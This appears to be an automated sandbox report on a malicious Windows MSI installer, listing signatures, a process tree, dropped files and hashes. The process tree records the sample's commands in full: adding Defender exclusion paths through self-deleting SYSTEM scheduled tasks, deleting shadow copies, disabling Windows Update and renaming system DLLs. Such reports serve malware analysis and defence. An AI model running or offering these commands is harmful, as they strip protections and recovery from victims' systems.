Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    01/08/2026, 11:00

General

  • Target
    install_c0rd019.msi
  • Size 9.3MB
  • Sample260801-m39bastbmd
  • SHA256 65c8a9fe8cb066b775ca22bbdb44ca800a5b32a6c6b130c9f7837114f1eea64d
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 8 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies file permissions 1 TTPs 9 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 4 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 7 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 9 IoCs
  • Drops file in Program Files directory 9 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Executes a command shell one-liner 1 TTPs 18 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 23 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install_c0rd019.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3428
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3220
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1204
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding DCEC40A928D88BC8C3BBEA68C844FB61 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:2468
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:1828
  • C:\Users\Public\I1oTsF\QYNAX9.exe
    C:\Users\Public\I1oTsF\QYNAX9.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3644
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\I1oTsF\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:2332
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\I1oTsF\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3424
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:3792
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:516
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:1316
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:3460
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:1548
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:1580
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:3520
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2828
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:420
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:4872
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:4264
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3648
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:2108
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:3324
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:1688
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:4728
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:1672
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:1956
                        • C:\Program Files (x86)\F8b73d\F8b73d.exe
                          "C:\Program Files (x86)\F8b73d\F8b73d.exe"
                          2⤵
                          • UAC bypass
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:1892
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:3648
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\F8b73d" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            PID:4812
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\F8b73d" /inheritance:r
                              4⤵
                              • Modifies file permissions
                              PID:1104
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:3684
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:1380
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                            3⤵
                            • Executes a command shell one-liner
                            PID:1868
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\F8b73d\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            PID:936
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\F8b73d\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:3152
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                                PID:2980
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Delete /TN "Task1" /F
                                4⤵
                                  PID:4160
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c echo.>c:\xxxx.ini
                                3⤵
                                • Executes a command shell one-liner
                                PID:3816
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                PID:2872
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2572
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                    PID:468
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Delete /TN "Task1" /F
                                    4⤵
                                      PID:2196
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\F8b73d" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:2480
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\F8b73d" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      4⤵
                                      • Modifies file permissions
                                      PID:1284
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\F8b73d\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:4308
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\F8b73d\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:2064
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\F8b73d\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                      4⤵
                                      • Modifies file permissions
                                      PID:4952
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\F8b73d\XPSPLOG.dll" /inheritance:r
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:1956
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\F8b73d\XPSPLOG.dll" /inheritance:r
                                      4⤵
                                      • Modifies file permissions
                                      PID:4972
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\F8b73d\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:4364
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\F8b73d\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      4⤵
                                      • Modifies file permissions
                                      PID:2096
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\F8b73d\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:376
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\F8b73d\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                      4⤵
                                      • Modifies file permissions
                                      PID:1756
                              • C:\Windows\system32\cmd.exe
                                cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                1⤵
                                • Executes a command shell one-liner
                                • Suspicious use of WriteProcessMemory
                                PID:2140
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                  2⤵
                                  • Windows security bypass
                                  PID:1212
                              • C:\Windows\system32\cmd.exe
                                cmd.exe
                                1⤵
                                  PID:4716
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:4992
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:4652
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:4472
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:5096
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:3876
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:1404
                                • C:\Program Files (x86)\F8b73d\F8b73d.exe
                                  "C:\Program Files (x86)\F8b73d\F8b73d.exe"
                                  1⤵
                                    PID:2468
                                  • C:\Program Files (x86)\F8b73d\F8b73d.exe
                                    "C:\Program Files (x86)\F8b73d\F8b73d.exe"
                                    1⤵
                                      PID:4316
                                    • C:\Program Files (x86)\QLd42q6\27ZM1.exe
                                      "C:\Program Files (x86)\QLd42q6\27ZM1.exe"
                                      1⤵
                                        PID:4844
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\F8b73d" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                        1⤵
                                        • Modifies file permissions
                                        PID:1548
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\F8b73d\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                        1⤵
                                        • Modifies file permissions
                                        PID:436
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\F8b73d\thumbs.db" /inheritance:r
                                        1⤵
                                        • Modifies file permissions
                                        PID:2356
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Run /TN "Task1"
                                        1⤵
                                          PID:3240
                                        • C:\Windows\system32\cmd.exe
                                          cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                          1⤵
                                          • Executes a command shell one-liner
                                          PID:552
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                            2⤵
                                              PID:4492
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Delete /TN "Task1" /F
                                            1⤵
                                              PID:3696
                                            • C:\Windows\system32\cmd.exe
                                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\F8b73d" /t REG_DWORD /d 0 /f
                                              1⤵
                                              • Executes a command shell one-liner
                                              PID:412
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\F8b73d" /t REG_DWORD /d 0 /f
                                                2⤵
                                                  PID:2540

                                              Network

                                                    MITRE ATT&CK Enterprise v16

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    e583dd0.rbs

                                                    • Path C:\Config.Msi\e583dd0.rbs
                                                    • Size 7KB
                                                    • SHA256 e7e430edbeeb80090e5cf4b3ef0147e72e3a4a4a5fd2beafbf92bca6ef858814
                                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                                    F8b73d.exe

                                                    • Path C:\Program Files (x86)\F8b73d\F8b73d.exe
                                                    • Size 145KB
                                                    • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                                    XPSPLOG.dll

                                                    • Path C:\Program Files (x86)\F8b73d\XPSPLOG.dll
                                                    • Size 4.6MB
                                                    • SHA256 1276e6f8e46dc1e27436aaa74ad12e97a3b5611187b7126cec535fa7e8d2952e
                                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                                    image.png

                                                    • Path C:\Program Files (x86)\F8b73d\image.png
                                                    • Size 5.0MB
                                                    • SHA256 d496f8cf3f8e60af0f73b38a90338721cfaf309cd7eccf54a7084f24577b9188
                                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                                    thumbs.db

                                                    • Path C:\Program Files (x86)\F8b73d\thumbs.db
                                                    • Size 358KB
                                                    • SHA256 1f2345b850d0c10830447e183a1384a4e40f605e6f34151592037c40091ed8a5
                                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                                    XPSPLOG.dll

                                                    • Path C:\Program Files (x86)\QLd42q6\XPSPLOG.dll
                                                    • Size 4.6MB
                                                    • SHA256 b4acf9bdda183fae2361eada5a20befe58aa7b531afab4d9ecf19a45339be4ef
                                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                                    image.png

                                                    • Path C:\Program Files (x86)\QLd42q6\image.png
                                                    • Size 5.0MB
                                                    • SHA256 dbe2fa6aeff900b92efe5cd054e368e9ecfe6bccaa3f5e0d4d55fcfc2459eb4f
                                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                                    QYNAX9.exe

                                                    • Path C:\Users\Public\I1oTsF\QYNAX9.exe
                                                    • Size 135KB
                                                    • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                                    UxEnhance64.dll

                                                    • Path C:\Users\Public\I1oTsF\UxEnhance64.dll
                                                    • Size 3.1MB
                                                    • SHA256 1b865dcbd3bcf529f1016fbf11eb04b23cc7de2e430803aa722834ad242f5f7f
                                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                                    adoresd.dat

                                                    • Path C:\Users\Public\I1oTsF\adoresd.dat
                                                    • Size 4.7MB
                                                    • SHA256 770c0ee7e0df86b1783953234704c93f7a63787a8d5bb31ccf14dd39afa554fb
                                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                                    msadox.tb

                                                    • Path C:\Users\Public\I1oTsF\msadox.tb
                                                    • Size 8KB
                                                    • SHA256 83fcb1e1f1def346853a9c67b310dd6d803453324634192de62e8484d7e46eb9
                                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                                    destopbak.ini

                                                    • Path C:\Users\Public\Music\destopbak.ini
                                                    • Size 2B
                                                    • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                                    • MD5 SHA1 SHA512

                                                    MSI3FA5.tmp

                                                    • Path C:\Windows\Installer\MSI3FA5.tmp
                                                    • Size 9.3MB
                                                    • SHA256 000a899696fe3012e84c2f055b907e49872157bc9d392d1b727b4ea4cb35df6d
                                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                                    e583dcf.msi

                                                    • Path C:\Windows\Installer\e583dcf.msi
                                                    • Size 9.3MB
                                                    • SHA256 65c8a9fe8cb066b775ca22bbdb44ca800a5b32a6c6b130c9f7837114f1eea64d
                                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                                    metadata-2

                                                    • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                                    • Size 24.1MB
                                                    • SHA256 8e569a624526f1e38b9a0b2ebe7d535b05e7e272531cc73383df79f286adda09
                                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                                    {c9af4e1b-3cdf-415e-bbfb-5e5c03404497}_OnDiskSnapshotProp

                                                    • Path \??\Volume{cd0aa2ae-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{c9af4e1b-3cdf-415e-bbfb-5e5c03404497}_OnDiskSnapshotProp
                                                    • Size 6KB
                                                    • SHA256 d1015567d5ba96f6cf4ae07fc2d6862059052bad43a021df89b5b09167ec68d4
                                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                                    memory/1892-206-0x0000000003000000-0x0000000003807000-memory.dmp

                                                    memory/1892-180-0x0000000075130000-0x000000007587A000-memory.dmp

                                                    memory/1892-270-0x0000000003000000-0x0000000003807000-memory.dmp

                                                    memory/1892-235-0x0000000003000000-0x0000000003807000-memory.dmp

                                                    memory/1892-218-0x0000000003000000-0x0000000003807000-memory.dmp

                                                    memory/1892-207-0x0000000010000000-0x0000000010061000-memory.dmp

                                                    memory/1892-204-0x00000000007B0000-0x00000000007C4000-memory.dmp

                                                    memory/1892-191-0x0000000003000000-0x0000000003807000-memory.dmp

                                                    memory/1892-187-0x0000000003000000-0x0000000003807000-memory.dmp

                                                    memory/1892-186-0x00000000007A0000-0x00000000007A1000-memory.dmp

                                                    memory/1892-184-0x0000000003000000-0x0000000003807000-memory.dmp

                                                    memory/1892-179-0x0000000000770000-0x0000000000771000-memory.dmp

                                                    memory/2468-236-0x0000000002CE0000-0x00000000034E7000-memory.dmp

                                                    memory/2468-45-0x00007FFE8E420000-0x00007FFE8E430000-memory.dmp

                                                    memory/2468-12-0x00007FFE9E770000-0x00007FFE9E772000-memory.dmp

                                                    memory/2468-263-0x00000000003F0000-0x00000000003F1000-memory.dmp

